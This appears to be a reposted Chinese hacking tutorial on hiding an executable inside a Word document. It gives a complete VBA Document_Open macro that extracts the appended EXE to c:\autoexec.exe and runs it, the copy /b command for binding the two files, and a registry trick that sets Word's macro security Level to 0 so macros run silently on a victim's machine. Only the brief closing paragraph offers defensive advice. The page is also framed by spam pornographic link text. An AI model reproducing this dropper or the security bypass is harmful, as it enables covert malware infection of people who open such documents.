欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

打開(kāi)APP
userphoto
未登錄

開(kāi)通VIP,暢享免費電子書(shū)等14項超值服

開(kāi)通VIP
EXE變成DOC
信息來(lái)源:www.hackblog.com

很多時(shí)候想做的東西不及時(shí)做出來(lái),就會(huì )象這編文章一樣遲遲才能發(fā)表出來(lái),原來(lái)寫(xiě)好的稿子不知道已經(jīng)不知道放到什么地方去了,這編是重新整理過(guò)的.

其實(shí)這種轉換并不是文件格式上的變化,只不過(guò)是把一個(gè)EXE文件接在一個(gè)DOC文件的末尾而已,這個(gè)DOC文件當然就不是不同WORD的文檔啦,該文檔中包含了宏語(yǔ)句,能在運行的時(shí)候把接在自己文件末尾的EXE文件數據讀取出來(lái)并運行,就造成一種假象,好象文檔打開(kāi)時(shí)就運行了EXE文件似的.(和文件捆綁器的原理很象啊!)


熟悉VB的朋友都知道,WORD的宏是使用VBA來(lái)編寫(xiě)的,具體語(yǔ)法和VB一樣,但有些方法VB中沒(méi)有,如宏病毒就是利用宏復制語(yǔ)句來(lái)達到感染的目的.和VB一樣,我們可以在編寫(xiě)宏的時(shí)候調用WINDOWS API!!下面我們來(lái)介紹一下我們編寫(xiě)這個(gè)宏需要用到的API函數:

1)CreateFile 用于打開(kāi)文件,該函數VB的聲明如下:
Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDistribution As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplate As Long) As Long


2)CloseHandle 用于關(guān)閉被打開(kāi)文件的句柄,該函數VB的聲明如下:
Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long


3)ReadFile 用于從被打開(kāi)文件中讀取數據,該函數VB的聲明如下:

Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long


4)WriteFile 用于把讀取出的數據寫(xiě)入文件,該函數VB的聲明如下:

Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long


5)SetFilePoniter移動(dòng)文件指針,該函數VB的聲明如下:

Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, ByVal lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long


6)下面是以上函數的參數聲明

Public Const GENERIC_READ As Long = &H80000000

Public Const GENERIC_WRITE As Long = &H40000000

Public Const FILE_SHARE_READ As Long = 1

Public Const FILE_SHARE_WRITE As Long = 2

Public Const CREATE_NEW As Long = 1

Public Const CREATE_ALWAYS As Long = 2

Public Const OPEN_EXISTING As Long = 3

Public Const OPEN_ALWAYS As Long = 4

Public Const TRUNCATE_EXISTING As Long = 5

Public Const INVALID_HANDLE_VALUE As Long = -1

Public Const FILE_ATTRIBUTE_NORMAL As Long = &H80


好了,有了這些準備工作就可以開(kāi)始了,我們運行WORD2000,打開(kāi)VISUAL BASIC編輯器,新建一個(gè)模塊,把上面的函數和參數聲明拷進(jìn)去!再回到“ThisDocument”的代碼視圖,選擇Document Open的事件,輸入一下代碼:


Private Sub Document_Open()

Dim buffer(65536) As Byte

Dim h, h2, j, i, k As Long

h = CreateFile(ThisDocument.Path & "/" & ThisDocument.Name, GENERIC_READ, FILE_SHARE_READ + FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0)

‘以SHARE_READ的方式打開(kāi)自身的DOC文件

h2 = CreateFile("c:\autoexec.exe", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0)

‘新建一個(gè)EXE文件準備存放讀取出來(lái)的數據.

If h = INVALID_HANDLE_VALUE Then

Exit Sub

End If

k = SetFilePointer(h, 32768, nil, 0)

‘把文件指針移動(dòng)到DOC文件與EXE文件交界處.

Do

i = ReadFile(h, buffer(0), 65536, j, 0)

i = WriteFile(h2, buffer(0), j, j, 0)

Loop Until j < 65536

CloseHandle (h)

CloseHandle (h2)

Shell "c:\autoexec.exe"

‘運行EXE文件

End Sub

這樣宏就編寫(xiě)好了,注意的地方就是上面SetFilePointer函數的使用部分:32768是你編寫(xiě)完宏保存好的DOC文件的文件大小,不一頂就是32768哦,大家注意!


大家可能有疑問(wèn),如何把EXE文件接到DOC文件后面呢?很簡(jiǎn)單,把你要接的EXE放到和這個(gè)DOC文件同一個(gè)目錄下.運行DOC命令:


copy /b xxxx.doc + xxxxx.exe newdoc.doc


這樣就可以了~~~.當你打開(kāi)這個(gè)NEWDOC.DOC的時(shí)候,宏就會(huì )把后面的EXE文件讀出來(lái)并保存在C:\AUTOEXEC.EXE中,然后運行,是不是很恐怖啊!不過(guò)這需要你的WORD2000安全度為最低的時(shí)候才能實(shí)現,關(guān)于這個(gè)安全度的問(wèn)題,我們又發(fā)現了微軟的小BUG,大家看看注冊表中這個(gè)鍵:


HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security 中的

Level值.當安全度是3(高)的時(shí)候,WORD不會(huì )運行任何的宏,2(中)的時(shí)候WORD會(huì )詢(xún)問(wèn)你是否運行宏,1(低)的時(shí)候WORD就會(huì )自動(dòng)運行所有的宏!但很容易就被發(fā)現安全度被設為低了,聰明的你一定想到如果這個(gè)值變?yōu)?的時(shí)候會(huì )怎么樣!!??對了!如果設為0的話(huà),WORD里面就會(huì )顯示安全度為高,但卻能自動(dòng)運行任何的宏!!是不是很夸張??和注冊表編輯器的后門(mén)一樣這都是MS的后門(mén)吧?


如果要受害人的機器接受你的DOC文件又能順利運行,最重要就是把WORD的安全度在注冊表中的值改為0,怎么改??方法太多了吧,單是IE的惡意代碼能實(shí)現的都太多了,另外,如果網(wǎng)頁(yè)上連接上是DOC的話(huà),IE也會(huì )自動(dòng)下載該DOC文件!危險的MS啊!!


這個(gè)算不算漏洞我不敢說(shuō),但防范真的很難,除非一天到晚監視著(zhù)注冊表,或者不用WORD?太消極了吧,最重要的是小心防范,陌生人的東西千萬(wàn)不要收!包括非EXE文件,我們現在發(fā)現了DOC文件能隱藏EXE文件,也會(huì )有人發(fā)現其他文件能隱藏EXE,所以大家千萬(wàn)要小心
本站僅提供存儲服務(wù),所有內容均由用戶(hù)發(fā)布,如發(fā)現有害或侵權內容,請點(diǎn)擊舉報。
打開(kāi)APP,閱讀全文并永久保存 查看更多類(lèi)似文章
猜你喜歡
類(lèi)似文章
(引用)VB中使用API函數sndPlaySound
使用WININET的函數寫(xiě)下載功能 -- VB
VB - 播放WAV文件
VB代碼VB小程序:實(shí)現USB攝像頭視頻圖像的監控、截圖、錄像
功能強大的SendMessage函數 vb編程
VB 查找游戲窗口句柄的方法
更多類(lèi)似文章 >>
生活服務(wù)
分享 收藏 導長(cháng)圖 關(guān)注 下載文章
綁定賬號成功
后續可登錄賬號暢享VIP特權!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服

欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久